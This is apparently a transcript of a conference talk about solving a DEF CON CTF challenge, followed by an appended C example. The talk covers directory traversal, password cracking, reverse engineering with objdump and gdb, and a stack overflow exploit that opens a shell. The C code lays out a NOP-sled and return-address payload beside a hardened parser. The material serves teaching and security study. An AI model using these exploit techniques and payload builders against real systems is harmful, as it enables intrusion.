So, let's just begin. You don't like the music? Can somebody make me more important than the music? Very good. Now, the music was to keep you guys kind of from getting out of hand, because you're all real patient and docile at the moment, right? Yeah. Well, it wasn't my fault, just so you know. Don't blame me. We're in this together.

Anyway, introduction. I'm Atlas. Nice to meet you all. There are only a couple of differences between what you got on the CD and what you're going to see up here, namely my email address and my blog site. So make sure you write those down when they come up, because there's stuff later on in the slides that says, oh yeah, Atlas's brain-dead tips to reverse engineering. They're on my blog later on tonight. They're not in the prezo. Okay? Good.

Let me start out by saying that I am not better than any of you guys. This is not a "hey, look at me, I'm great" talk. This is kind of what happened to me. I've been doing a lot of fun stuff. Most people in this room probably could do what I've been doing. I'm going to show you some of how. Is that good? I've been very blessed, just given a lot of curiosity, probably above-average intelligence, but that probably describes everybody here, right? Except for the one guy in the back.

All right, here it is. Write it down: atlas at ratboy.com, I'm sorry, r4780y.com. The blog site, atlas.yada yada.

A little bit about me. I was expecting to have a traveling microphone here. I'd like to move around. This is good. All right. A little bit about me. Dad worked for IBM. I got a PC when I was seven. Started programming when I was eight. Thank you, brother, because my brother was teaching me. He's like eight years older than me. He's like, hey, look, you do the CLS, and it clears the screen. Sweet. So I've been programming since I was eight, if you consider Advanced BASIC programming. Some of you probably don't, but that's all right. Started college as a vocal performance major. You should have been gone.
Anyway, you probably should have been before that. Hit pre-med before deciding that I had run away from my first love long enough. Got my bachelor's degree in computer science. Again, something you guys could have done, just something that I chose. After college, I got out, became a network engineer. Thought I was done with programming. Got into teaching, consulting, a lot of good money there. You don't have to know a lot about stuff to make a lot of money. You guys have probably put that together, haven't you? Well, that's where I was heading. Moved into telecom, where I got away from dealing with all the angry users a lot. And I moved into the more technical field, and you know what? I didn't even get a pay increase.

So telecom introduced me to hacking and exposure, because I started taking over the firewalls and doing all that stuff. After I'd been in telecom a couple of years, my boss says, I want you to go to SANS. And I want you to take, think outside the box. Don't think about telecom. Think something else. I said hacker track, dude. Must be. And I took the hacker course with Ed Skoudis, who promised me he was going to be here. And if he's here, can somebody point him out? And if he's not, everybody boo him when you see him later. His wife is pissed. So if you go check out the CTF, you'll probably know where to find him. Anyway, good friend of mine now. He was a mentor.

Capture the Flag, according to his teaching, was very different. So when I saw DEF CON say, hey, we got this Capture the Flag, I'm thinking, dude, I know Metasploit. I know Nessus. I can find the vulnerabilities. I can go download some script. I'm in. All right. So I signed up really, really naively. I actually asked a bunch of guys to join a team, but that's a long story. So about June 3rd. So when prequals started last year, probably some of you guys knew that. June 3rd, I had forgotten.
I said, okay, I got an email from these Kenshoto guys that says, 10 o'clock tonight I'm supposed to be doing something. Oh my gosh. We had visitors coming in from out of town, like four hours away. I had just adopted a little baby. Those are my kids. I'm a happy father. And we'd adopted, like, a week and a half before. So I've got the screaming baby. We got her out of the hospital. Not a good thing. So I was already used to no sleep, though. So sleep deprivation was good for my hacking career. But I was limited to about midnight to about five in the morning. All that baby status. You and me going to rumble. You can't have her back. To make matters worse, all my buddies that I said, hey, let's go be a team, they didn't show up. Kenshoto very nicely said, we'll give you the individual status so you can keep hacking.

So briefly, who here, show of hands, who's done Nessus and maybe some Metasploit, download some code and exploit machines? Excellent. Who remembers the first time they saw a shell prompt on their Linux box? Oh yeah. That is one of those turning points in life. It's very memorable.

So I started out, cool. This is Capture the Flag. I'm going to learn about this box. The only thing we were told was, duzur.kenshoto.com is the only machine you can hack. Go ahead. Go forth and be malicious. Okay, that's cool. I can deal with that. So I start reconnaissance. Okay, reconnaissance. Going back to my SANS days. Well, I got everything that I got right there because they just brought up the site. Their email was it. So I move into scanning. The nmap scan showed up three ports. 22, SSH. Port 80, Apache. And 6969. Some sort of really weird sex port or something. Anybody going to ShmooCon this year? All right. 22 was totally patched, up to date. No known vulnerabilities. Apache, same thing. Going, what the heck? This kind of sucks. So I dig in. Maybe they got a web app. I check out the web app. Web app has a hidden field. All right, I'm in now. I can understand this.
Hidden field, I tweak around with it. Got a whole lot of errors until finally I find out "file not found". Ooh, okay. So I was able to directory-traverse up and view any file on the system. Didn't get me in, but it got me a lot. Including the password file. Little bit of cracking of the password file. Mind you, I zoomed right over the first key because it was stuck in the password file. It's too interesting getting the box. Anyway, in the password file, I throw it into John. You guys have probably done this. That's cool stuff. Really cool. John's great. John spits out immediately, within one minute, the root password and some "breakme" password. No remote root. Suck. So I wasn't in.

But this breakme. Breakme was kind of cool. I hit breakme. My screen just went wild and it spit out the key. Key number two. Wait a minute. Where'd key number one go? Well, that was back in the /etc/passwd file. So key number two got spit out to me and I had to try it again to see what that was. Dumped it to a file. Turns out the login script dumps a base64-encoded binary and then clears the screen a bunch of times and spits out the key. What the heck? Un-base64. You know the Perl... What is that? Use the MIME::Base64 thing and spit out a binary. I run file on it. For those of you here with security expertise, maybe in forensics, you know what file does. File spits out, oh my gosh, it's an ELF 32-bit binary. That's kind of scary. Okay. I'm trembling. I do strings on it and I see "protocol failure". Oh crap. I remembered back during my initial scanning this port 6969, when I hit it wrong it spits "protocol failure". Oh. To quote one of my favorite lines out of Speed, oh darn.

So at that point I was in mental surrender. Dude, it's like, I have never considered writing a binary exploit. Never. That is the realm of the gods. So I'm here to tell you it's not. Most of you could probably do it. Some of you probably have. So no disrespect to you guys.
I had tons of fear, uncertainty, and doubt, and it was well founded because I knew nothing. I was way out of my comfort zone. All I remembered was stuff from my forensics exam that taught me about objdump and readelf and a couple of others that I just started poking around with, which is of course the next slide, sorry. And then of course I find a new hope. I thought, I can do this. They're expecting me to do this. I better give it a shot or I'm just gonna give up and go crawl in a hole.

I had been reading a book that my in-laws bought me called Hacking: The Art of Exploitation. Who here has that book? Excellent book. Excellent book. I got bored and I quit reading it at page 20 because it was basically recap. It's all theoretical. When I went back I found page 23 is when they get into writing buffer overflow exploits. I could have already had all this knowledge. So I start reading like crazy and I learn, oh my gosh, I can do this. Got on my Linux box. I was able to write an exploit. Sweet. I also found a paper on Exploite X on writing remote buffer overflow exploits. Very different game, because then you got the whole network thing involved. But the thing that got me through it was sheer simple determination. I was looking really desperately for a good picture. I liked the bear.

So that's pretty much all about me. Now we're really gonna get into what happened, what I learned. This is more of an "oh my gosh, I was really stupid" type thing, and I learned a lot, and I'm trying to brain-dump some of that.

What I used was objdump. Really cool tool with a ton of ability to analyze and decipher binary executables. Works on ELF for Unix. Works on the PE file, which is the standard Windows EXE and DLL. I used readelf. Very limited. objdump did everything that I really wanted and I got used to it. But readelf I had to poke into. It's another very cool tool. Doesn't do the disassembly part but does just about everything else that objdump does. I got to know GDB, the GNU debugger.
I remember a long time ago copying and pasting stuff into debug on the DOS and Windows machines to hack up DOS EXEs. GDB, wow. If you talk to people in the industry they're gonna say, yeah, it's a piece of crap. And indeed it has a lot of weaknesses, but it helped a lot and it taught me a lot. I worked with ktrace and kdump, which is the kernel hooker: as a program talks to the kernel to make system calls like read and close and printf and all that stuff, this sucker intercepts it and spits it out in a format that you can make some logical identification out of. And now I wrote a tool called disass, because I wasn't happy with what objdump spit out, especially for some binaries. I wanted to know more and I wanted not to have to go through and manually do more. It's not an excellent tool; it helps me out. And in my release of the utility belt, which you guys will find on my blog later on too, you'll find disass. Lots of fun.

So we'll run through the tools just a little bit. Can any of you read this? Sorry, I'll summarize. This is objdump's help output. Basically it allows you to look at the various headers in an executable, which tell a ton of information. It allows you to disassemble the text or all sections. Anybody done assembly in here? Good, you'll like it better than the rest of you. If you don't know assembly there are tons of good books out there; I could probably hook you up with some interesting stuff. Reverse engineering a binary that you don't know, you've really got to hunker down and learn your ASM. objdump also spits out relocation points. So in a file you've got everything laid out in a very different fashion than it's going to appear in memory, and some of the stuff that's copied into memory you want to call by name, the computer knows it by number, and the relocation points allow you to basically do a DNS lookup on these locations. objdump -d, you probably can't see that either. You can read it on the PDF that you got on the CD.
This is the very beginning of the disassembly for the bash shell. Again, readelf's help, you'll see a lot of interesting stuff. I print these out kind of as a placeholder, so if you're reading the PDF later, let's go play around with that a little bit, because playing around is the name of the game. If you couldn't read that before, you really can't read this. Again, it is on the PDF.

This is a ktrace output of stage three, actually. I use a ktrace call, give it the process ID of the binary, and it says, okay, we're going to call this and it returns this, call this, and it's calling select. Anybody done programming? Do you know what select does? Select, if you've got like a file descriptor or something that points at an object like a file or a device, select will allow you to say, is anything waiting to come in on this file descriptor? Very helpful. It goes down, it hits accept, and if you're not into network programming, you learn accept. It's the first call for, anybody yell it out? What kind of connection? A TCP connection. You hit accept: you've got a listener and then you call accept and it just kind of sits there and waits for somebody to connect. Hey, how's it going? Somebody connects, accept returns an active file descriptor to a network socket. It's really cool stuff. You can read and write to it almost like you were reading a file. So I know that that's where it starts the network connection. It goes down and calls a fork, which is a way of spinning off a little child process and running it, calls a, oh, it calls read, wow, go figure, and it gives information on the memory location where that stuff goes.
This is a wealth of information. I'm not going to cover it as well as I should. You'll see near the bottom "bacon", colon, my name, colon, my password, colon, something else. That's kdump telling me what I put in there from the network connection. My little client that I wrote spits that in there. kdump tells me that; it also prints out all the stuff that's written back, like down below it, it says "tag failure". I screwed up. I didn't know what I was doing. I was just trying stuff. So I made a conscious decision: I'm going to work this until it kills me or until I get it.

So I bring up BSD on VMware, run the stage 3 binary, which used to be called "binary" in the previous slides. I renamed it to stage3, ran it with 6969 because it wants a port number. I wanted it to look just like it would on the contest box, right? Then I started ktrace. ktrace watches how the program executes. Started a netcat session. Who here uses netcat? Let me hear it: netcat is your friend. Very good, some of you. Let's hear it again: netcat is your friend. Unless of course you're trying to shove Perl into it with unbuffered I/O, and anyway. So I shove in netcat to 6969 on the localhost machine I'm hacking. I give "bacon", my name, my password, something else, and then I run kdump and you see the output on the previous slide.

Then I get into GDB. Very cool stuff, very scary. gdb stage3, and then I put in the PID, and what you'll see on there is an operating system, a Unix call to grab the PID of stage3. And I analyzed ktrace, as I was too freaked out by assembly and actual reverse engineering. So it's okay if you get to a point where you're like, dude, I'm just not comfortable with that, I don't know what I'm doing. That's cool. That's fine. Do something. Keep going. In the ktrace, wait a minute, I just saw most of that. Okay, this is a continuation of what happened, and so on. Nothing of interest. So basically I'm playing "dude, where's my shell" all over, and I'm traipsing around using GDB, traipsing around memory space, trying to find my input. ktrace told me
where the thing was going. I could have probably found out from many other places a good idea of where to look, but I didn't know, and that's okay. What's at this memory location? Keep going. Oh my gosh, I ran into a boundary that can't actually spit back anything. I was learning a lot about virtual memory. Virtual memory is basically the computer assigning a huge memory space to an application even though you don't have that much memory, figuring that you'll run out of memory if you run out of memory, and they want to give you as much leeway as they can. I had no idea that all this stuff was identified in the ELF binary itself, the memory locations, and so I just kept meandering. objdump -x would have told me a lot of what I need to know, and so I'm going to share with you just a little bit about what it means.

objdump -x means dump all header information, not just the section, not that section, all of it. It's broken into four parts, oops. The file header: you've got an ELF binary, so it's an ELF file. It comes with its own little header at the very beginning that tells about the rest of what you're going to see in the file. It also prints out the program headers. The program headers say we're going to map this part of the binary to this part of virtual memory. Cool. It also lists some dynamic stuff: we require this library before we can run, so if you don't have it, boom, you get an error. And it also spits out section information. Assembly coders, what section, as oddball as it may sound, what section does your code go in? Text. Okay, yeah, no, I'm sorry, your strings don't go in text, code goes there. So text is one of many sections. So we're going to talk about some of that, because in the end we're not talking about assembly being converted to machine language. That's actually an oxymoron. Assembly is a representation of machine language. It's a one to one. There's no compiling going on. The compilers take it from C down to assembler, then it runs an assembler to convert the assembly into machine
language to make an object, and then the linker comes along, as if we didn't do enough work, the linker comes along and says yes, you're blessed, you may start, and starts mapping real addresses based on requirements of other libraries. It's very cool stuff. I just bought, at the prodding of my good friend Visigoth from Capture the Flag, the Kenshoto guy, he's awesome, at his prodding I just bought Loaders and Linkers, or Linkers and Loaders, whatever. It's a really good book. What's that? Linkers and Loaders. Exceptional book. Really scary. Had I read this a year ago I would have been totally over my head.

So at the very beginning we get the file header, the ELF file header. It says, hey, this is an ELF32 made for the i386 instruction set. Okay, that's cool. So it's not like some Mac that runs, sorry, not a Mactel but an actual Motorola Mac, the old days. It has some of the things that it can do and a starting address. So after the loader stuff loads from the file into memory, it drops the instruction pointer into this location. Kind of like in Demolition Man, you know, they had him all filled up with that really weird goopy stuff, naked, kind of scarring me, and they drop this one little blue thing, God only knows what it is, boom, hits and everything happens. That's the starting address.

Here, the program headers. You'll notice overlap. There is some, I'm sorry, they encompass each other. You'll notice on the left-hand side there are different types of program headers. I don't want you guys to be afraid here; this is like part of the visual effect. You've got different types of program headers. The first one is the program header header. Well, basically that defines where the program header is going to exist. That's fine. The two of most importance are the load header types. These actually will load from the file into virtual memory space. The first one starts off at byte zero in the file and it maps to 8048000. This is a BSD box; that number will vary, and oftentimes it'll look different between platforms. Not very important, but
just something you'll know. So that actually maps your binary into virtual memory, even including the ELF header stuff that the OS only cares about. So if you go in GDB and show that memory location and keep going, you'll actually be seeing the bytes from the executable file. The second one starts at 8048000 and offset 2000 inside the binary file. Those are really round numbers; you can add things so that it works out that way. That plays into binary manipulation, which this talk won't get into, but if you ever go that far, that's a lot of fun stuff. The others you'll find map into the other loadables. The loadables have certain flags basically saying I can read, I can write, and I can execute this memory. So if you want to put in your code, you want to inject some code somewhere in an ELF executable, don't go for the second one in this example, because it only has read and write permissions turned on. I'm going way too deep, aren't I? I'll move on. Anyway, the program headers are awesome and very important.

The dynamic section is quite interesting. It lists several disparate things. It's kind of like the miscellaneous area. It says I need these libraries to run. Those are OS libraries; they don't really mean that I have to install anything. It talks about where the initialization is, where the finishing is, several other things I won't get into, except maybe the GOT, the global offset table, and the PLT, the program linkage table. These are used by your program because you don't want to rewrite printf. They are used by your program to jump to a local little section of code, which gets transferred to wherever printf was mapped into memory. Cool stuff. This is like a long time of research that you want to get into, though, if you're interested.

Now we get into the sections. What was that section again, where your code goes? Text. Text is section 9 in this binary. There are a lot of other sections. You'll notice the PLT and you'll notice the, where is it, you'll notice the GOT, and you'll notice a lot of other stuff:
read-only data. .rodata is helpful when reversing a binary. I won't go into the rest of them, but it says the section of code, or of whatever, that's in the file, it lives in the file with this offset and it needs to be mapped into memory here. So again, by looking at this information I can tell what virtual memory space looks like. Now remember, a year ago I didn't know this stuff. I wanted to share this with you so that if you decide to take this assignment you won't have to do a lot of the meandering and silly, pointless things that I did. Well, they weren't pointless.

We also see the symbol table. This can show everything from the section information and even your own written code, functions, methods, and where they map to. This is your little lookup service area. So when you want to know what lives where, let's say I want to know where main lives in memory, boom, right here. I look for main. As long as these symbols aren't stripped it helps me out. Every binary is different. It's important to realize that if you're really good on one binary, it doesn't mean that they can't make a binary that you would love to hate and would make your eyes bleed. I know last year they had a finger daemon where everything was statically compiled. It means these shared libraries were sucked into the overall binary, and then they stripped all the symbols, so we didn't know what was what. Real buzzer.

So was it a waste of time? Well, obviously not, because I'm here talking. But no, this was not a waste of time. The most difficult thing for me to get over was the fact that I thought I needed to be doing something and having some tangible results for it to be worth my time. But to this day, you'll come in and watch us. I lead the last-place team for Capture the Flag. We're called Last Place. I'm not hoping to end up there, but come check us out. Things that I learned during that meandering around memory space still play into the way that I play the game and anything else that I do, reverse engineering. Again, I'm not
going to go over all this. This is for your own visual enjoyment later, when you go back and you play with gdb. These are some of my favorite parts of gdb that help me get around, like a way to print out what's in memory, and the way to print out what a register holds in it, and how to set a breakpoint, how to continue after a breakpoint, because gdb's documentation is really good, right? Uh-uh. Also you can set up memory locations you want to be spit out at you every time you stop, after every instruction or after a breakpoint, and that can be set up using display. Just some really good stuff. Get into gdb on your favorite binary, just plug this stuff in, do a help on it: help info, help display, help.

And I also like to go through a binary, as long as it's not too big. My script will grab every call and create a breakpoint for it. This is really good for initial reverse engineering. I just hit continue and continue and I get to see what points in memory I'm stopping at, for basically watching the logic. And I'll sit there and I'll look at my dead listing, which is the disassembly, and I'll watch what the program's doing as it runs. I'll also start out with some very basic display settings. It'll show me EIP in the surrounding area, that's, I'm sorry, ESP in the surrounding area, that's the stack pointer, and EBP, which is the base pointer. They both point to the stack, but they give me a good idea of what's going on in the stack memory. It prints out several registers. This is what I use. You can make your own; you can download them as well.

So from that point I went into, to call what I was doing fuzzing, it was not anything, but I started throwing data at it. Basically I was running Perl, piping it to netcat, and seeing if I could break this thing, and I did. But yeah, later on it didn't work out so well. Metasploit: I was strapping my Perl code, which is very minimal, to a Metasploit exploit, which is Perl. There he was. I have to learn Ruby now if I want to use it, I suppose. I took a Perl, or a Metasploit, exploit shellcode,
shoved it into my Perl program, which then was shoved into netcat. Pretty kludgy, but it works, kinda. And here's how it didn't work. It's very important when writing a network exploit to run a sniffer. Any Perl coders here? You can admit it. Perl is great. The very first line here, dollar sign pipe, well, this is a variable, $|, and depending on what the value is, your program may or may not use buffered I/O. Why is that important? Because if you do multiple-line input into a binary over the network, you may want to give the service a little time in between lines, because otherwise it may not work real well. Buffered I/O was saying, okay, I'm only gonna wait until you get to this much data before I send anything, or until you close it. So I was sending the first line and then waiting a second, and it waited until I sent the second line to send the first line. So you wanna run a sniffer to run a remote exploit. I ended up, because I didn't really realize what I was doing, I was still learning Perl at the time, I ended up just rewriting using Perl network code instead of piping it to netcat, because I really needed that delay. The binary couldn't handle just shoving stuff down it.

This will show up better in your PDF too, sorry. This is output from disass. This is the disassembly. It actually just harnesses objdump to grab all the information that it can out of the binary, write up some tables, and spit out basically a more human understanding of what's going on. For example, for those of you who can read this, down to a call, the very first break in the upper section is a call, and it says "call to", and on this one it actually says which shared library. The first time I did that, I don't know what I had wrong, it didn't tell me what it was writing or what it was calling. So disass spits out calls to the GOT table: accept. So I'm gonna run through. Try to just listen to me if you can't see it. Believe it or not, I wasn't expecting this many people. I thought maybe half of you, so thanks for coming.
So we hit the accept. That's the first call. When we come back from accept, what do we have? We've got an active socket, one that's been initialized, and we got this two-way communication. The TCP three-way handshake's taking place, all that good stuff. A little bit farther down it says, okay, call this child request subroutine. It's just a handler. So we jump into the child request subroutine. That's the third section down on the right, and child request does the little initialization routine. Every subroutine starts out with push esp onto the stack, or I'm sorry, push ebp onto the stack, and then move the stack pointer into the ebp. So what we did is we've created a new frame, so that this stack area belongs to the subroutine. It's really cool. Very intelligent people made this up. The same very intelligent people, by the way, decided to grow the stack down, so that when we start putting stuff in a buffer we can overwrite stuff lower on the stack, like the return pointer.

So in here we call memset. memset just basically clears out the memory space, as in, I'll stick a zero here and all. And then we call authenticate. authenticate just goes through and it takes in the user ID that I hand in and checks it against my user ID and password on the Unix system. Pretty cool stuff. There were no vulnerabilities there, though. I'm skipping it. It comes back and it calls a write, moves down and accesses the input buffer. The thing that I want you to pay attention to here is right here. This is like my brainchild. It caused me great excruciating pain before I wrote this. disass goes through a subroutine, looks for local memory calls and calls to parameters that are passed in, and it spits them out here. Sorry, it's hexadecimal. This is a signed hex number. The big numbers, the fff ones, those are negative numbers; the small ones are positive numbers. So everything is based around that base pointer, you know, the stack base pointer we're talking about. The base pointer is the delimiter. If you're going against a parameter, you can say the
base pointer plus 8 or plus 12 or plus 16. If you're talking about a local variable, the base pointer minus whatever that converts to, and you know what, I don't really care, I do it in my head sometimes. What's most important here is that this tells me that between here, this variable start, and the next variable up, which is below it on the stack, is hexadecimal 40c. For you guys who don't care about hex right now, just consider that roughly hex 400, cause it's easy to say. And then take a look over here where we do our read. This is a call to a read. So we've come into child request, we cleared out the memory space, we called authenticate, and it says yes, you're good, or no, you're bad, and it spits out the results in this write. And then we get a read call, to call in, to read in the next line, and the parameters.

Kind of cool, interesting tidbit. On a call, where do you think the parameters are at? They're being pushed on the stack in reverse order from the way they appear in a C program. Okay, let me demonstrate. Call accepts, what is it, three parameters. The first parameter happened to be ebp plus 8. Oh, that's the parameter to this subroutine. Okay, the second parameter, that's the file descriptor, by the way, the socket. The second parameter, which you go one up in your disassembly, is a pointer to a memory location. It's a canned memory location; it's not going to change. 804A200 in this case. And the third parameter, who can tell me what a third parameter to a read call is? Network programmers, anyone? Limitation: how big will I allow this read to pull in? The size of the buffer, thank you. Can't read that probably, but I'll read it to you: hexadecimal 7FF, just shy of hexadecimal 800. So we've got a storage location of roughly hex 400 and a read-in of a maximum of 800. Okay, do the math. Might not jump out at you the first time through, but this is a good indicator that we might have something here. It doesn't happen, the overflow doesn't actually happen here, though. We've read in up to 7FF bytes into this memory
location, which we looked up, disass looked up, and came up with a variable called input buffer. Cool, I know what that is. Makes sense. We follow along just a little bit farther and we see a call to sscanf. Anybody know what sscanf is? What is it? It's like a formatted read. What is the s in sscanf for? String. We're not reading from a keyboard, we're not reading from a file descriptor, we're reading from a string. So what do we do? Our parameters say, well, our input string is 804A200. I know that's the input buffer. Our output is 8049C0A, and we've got some EAX which actually is just a pointer to a memory location inside the local sub. Oh wait, do you think that might be the memory location that's like 400 bytes long? I think so. Let's double-check that. One is called ffffbe8. Thanks for staying as long as you guys did. I enjoy your company. And this is, oh wait, load effective address, that's the assembly, ffffbe8 before ebp. Well, the address pointer of that is loaded into EAX, so EAX is actually looking at a point in memory. So we read in this input buffer using sscanf, looking specifically for the word "bacon". Which happened, little trivia, a lot of the Kenshoto guys, before they became Kenshoto, actually did a CTF team called Bacon. The interview that I read said it was because it was the only thing that they all had in common: they liked bacon.

So what do we have? Well, we've got a potential buffer overflow here, right? Why? Well, we take a string in that can be, for lack of a better word, 800 bytes long, hex, and we shove it into a buffer that could be 400 bytes long, hex. Well, yeah, but it's sscanf, we're like, formatted, but sscanf will peel off what, six bytes? So clearly we've got issues here with the buffer overflow. Once overflowed, you keep writing and you overwrite, first of all, whatever's between that variable and the base pointer. You overwrite the previous frame's base pointer, because that lives right at the base pointer, and then you overwrite ebp plus four. You won't actually see ebp plus four mentioned
anywhere in the code why well because ebp plus four is the return pointer it always is that's just the way that this works you know this because at the end of a at the end of a subroutine if you watch the leave and the ret function and I recommend that you do this holy crap I was just giving the warning it's time wow we gotta go anyway you overwrite the return pointer the subroutine keeps going you may have to actually manipulate what you stick in there to make it so that it's sane until it gets to the ret when it gets to the return it reads that in and eip the instruction pointer gets redirected to wherever you want it to go fun fun very cool I'm gonna slam through a couple more slides this is using my favorite gdb display variables so I'm doing 32 of these little four byte segments starting with the esp so this is esp blah blah blah esp plus hex 10, hex 20, hex 30, hex 40 meanwhile ebp minus 32 well why did I do that because I know that ebp is now going to be right here every time ebp is right there why do I care well because a lot of stuff that's in front of ebp I care about because that's local variables right that'll show up earlier a lot of stuff that shows up after I'm very interested in like this which happens to be the return pointer and when I'm done running the exploit here's my 90s not sled anybody hex 90 here's my shellcode actually sorry the shellcode started back here somewhere back here somewhere actually I overwrote here's the return pointer starting starting boom well that's where the return pointer is supposed to be what I ended up shoving in made it to the end of the subroutine they called leave which moves the base pointer stack pointer magic and then return starts execution of my program hello sex port 69 69 and the thriller conquest it worked ran the exploit printed out authenticate team 19 my password at the time it says okay hey that's cool then I feed in this bacon prefixed thing with a whole bunch of gibberish I started that cat go to 
31337 on that system and I got a shell ID WD and here's stage 3 stage 4 through 7 lots of fun no time I did go on to complete them before CTF it took me a couple weeks because I was still really newbie stick with it if you're interested do it this is not the realm of the gods here guys this is the realm of curious determined people like you and me and the more of us that can do this stuff the more secure or insecure the world will be but it'll be you making the decision not other people so what's coming what's gonna happen to me well it's becoming an addictive habit I average 4 to 5 hours of sleep at night and half for the last year I will continue until my fingers and eyes no longer work because to me this is binary porn I'm not gonna go through this stuff read it download the toolkit it's not exceptional it helps me out hopefully it'll help you out maybe it'll help you get started cool tools just like an un or a base 64 encoder decoder just a lot of fun tools that I find useful format strings anybody love to hate format strings it's got a format string generator yeah I love it yeah let's give 30 seconds here and there is an outtake because about through day 4 something like that I was typing at 5 in the morning and I'll tell you what it's really funny when you wake up typing and it almost looks like words this is the result here's to complete the transformation no longer kitty thank you very much
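Added example, written by the editor and not taken from the talk, the slides or Atlas's toolkit: the sscanf pattern the talk describes, rebuilt in C so the frame arithmetic can be checked. The only numbers taken from the talk are the 0x400-byte local buffer at ebp-0x418 (from lea ffffbe8(%ebp)). Everything else is an assumption for illustration: the return address 0xbffff4a0 is a made-up stack address, the saved-ebp filler 0x41414141 is arbitrary, and the five-byte "shellcode" is a constructed placeholder (xor eax,eax; inc eax; int 0x80, i.e. exit on 32-bit Linux) that is never executed. The block only lays bytes out in memory, so it compiles and runs on any host; the vulnerable parser is shown for contrast and is only ever called with short input.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Frame layout quoted in the talk: the sscanf target is a 0x400-byte local
 * addressed as lea -0x418(%ebp), so it starts 0x418 bytes below the saved
 * ebp. The saved ebp sits at ebp, the return address at ebp+4. */
#define LOCAL_BUF_SIZE    0x400
#define LOCAL_BUF_EBP_OFF 0x418

/* The bug pattern as described: an unbounded %s into a fixed stack buffer.
 * %s copies until whitespace or NUL, so an 0x800-byte token overruns the
 * 0x400-byte local. Shown for contrast only; never feed it long input. */
static int parse_bacon_vulnerable(const char *input) {
    char local[LOCAL_BUF_SIZE];
    return sscanf(input, "bacon %s", local) == 1;
}

/* Hardened form: the field width caps the copy at 1023 bytes plus the NUL. */
static int parse_bacon_safe(const char *input, char *out, size_t outsz) {
    char local[LOCAL_BUF_SIZE];
    if (sscanf(input, "bacon %1023s", local) != 1)
        return 0;
    if (strlen(local) + 1 > outsz)
        return 0;
    memcpy(out, local, strlen(local) + 1);
    return 1;
}

/* Distance from the start of the overflowed buffer to the return address:
 * everything up to and including the saved ebp, plus 4. 0x418 -> 0x41c. */
static size_t offset_to_ret(size_t buf_ebp_off) { return buf_ebp_off + 4; }

static void store_le32(uint8_t *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Lay out "bacon " + NOP sled + shellcode + saved ebp + return address.
 * The sled fills whatever the shellcode leaves of the 0x418 bytes before
 * the saved ebp, so the two 4-byte writes land exactly on ebp and ebp+4.
 * Returns the total length, or 0 if the payload does not fit. */
static size_t build_payload(uint8_t *out, size_t outsz, size_t buf_ebp_off,
                            const uint8_t *sc, size_t sc_len,
                            uint32_t fake_ebp, uint32_t ret_addr) {
    static const char prefix[] = "bacon ";
    size_t plen = sizeof(prefix) - 1;
    size_t total = plen + buf_ebp_off + 8;
    if (sc_len > buf_ebp_off || total > outsz)
        return 0;
    uint8_t *buf = out + plen;
    size_t sled = buf_ebp_off - sc_len;
    memcpy(out, prefix, plen);
    memset(buf, 0x90, sled);                                /* NOP sled */
    memcpy(buf + sled, sc, sc_len);                         /* just below ebp */
    store_le32(buf + buf_ebp_off, fake_ebp);                /* lands at ebp */
    store_le32(buf + offset_to_ret(buf_ebp_off), ret_addr); /* lands at ebp+4 */
    return total;
}

/* %s stops at the first whitespace byte and the C string ends at NUL, so
 * neither may appear anywhere in the token. This is the "keep it sane"
 * check: a return address with a 0x00 or 0x20 byte cannot be delivered. */
static int token_survives_sscanf(const uint8_t *tok, size_t len) {
    for (size_t i = 0; i < len; i++)
        if (tok[i] == 0 || isspace(tok[i]))
            return 0;
    return 1;
}

/* Demo harness: constructed placeholder shellcode, never executed. */
static const uint8_t demo_sc[] = { 0x31, 0xc0, 0x40, 0xcd, 0x80 };
static uint8_t g_payload[4096];
static size_t g_len;

static size_t demo_build(uint32_t ret_addr) {
    g_len = build_payload(g_payload, sizeof g_payload, LOCAL_BUF_EBP_OFF,
                          demo_sc, sizeof demo_sc, 0x41414141u, ret_addr);
    return g_len;
}
static unsigned demo_byte(size_t i) { return g_payload[i]; }
static int demo_survives(void) { return token_survives_sscanf(g_payload + 6, g_len - 6); }
static int check_parse(const char *in, const char *want) {
    char out[LOCAL_BUF_SIZE];
    return parse_bacon_safe(in, out, sizeof out) && strcmp(out, want) == 0;
}

int main(void) {
    /* 0xbffff4a0 is an assumed stack address, not one from the talk. */
    printf("len=%zu ret at +0x%zx survives=%d\n", demo_build(0xbffff4a0u),
           6 + offset_to_ret(LOCAL_BUF_EBP_OFF), demo_survives());
    /* The talk's input_buffer address 0x804a200 contains a NUL byte, so it
     * could never travel through %s as a return address. */
    demo_build(0x0804a200u);
    printf("0x0804a200 survives=%d\n", demo_survives());
    return parse_bacon_vulnerable("bacon hi") ? 0 : 1;
}
```

The point of the second run in main is the caveat the talk glosses over: whatever you overwrite the return pointer with has to pass through the same parser as the rest of the token, so an address with a NUL or whitespace byte (0x00, 0x09 to 0x0d, 0x20) never reaches ebp+4 intact.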
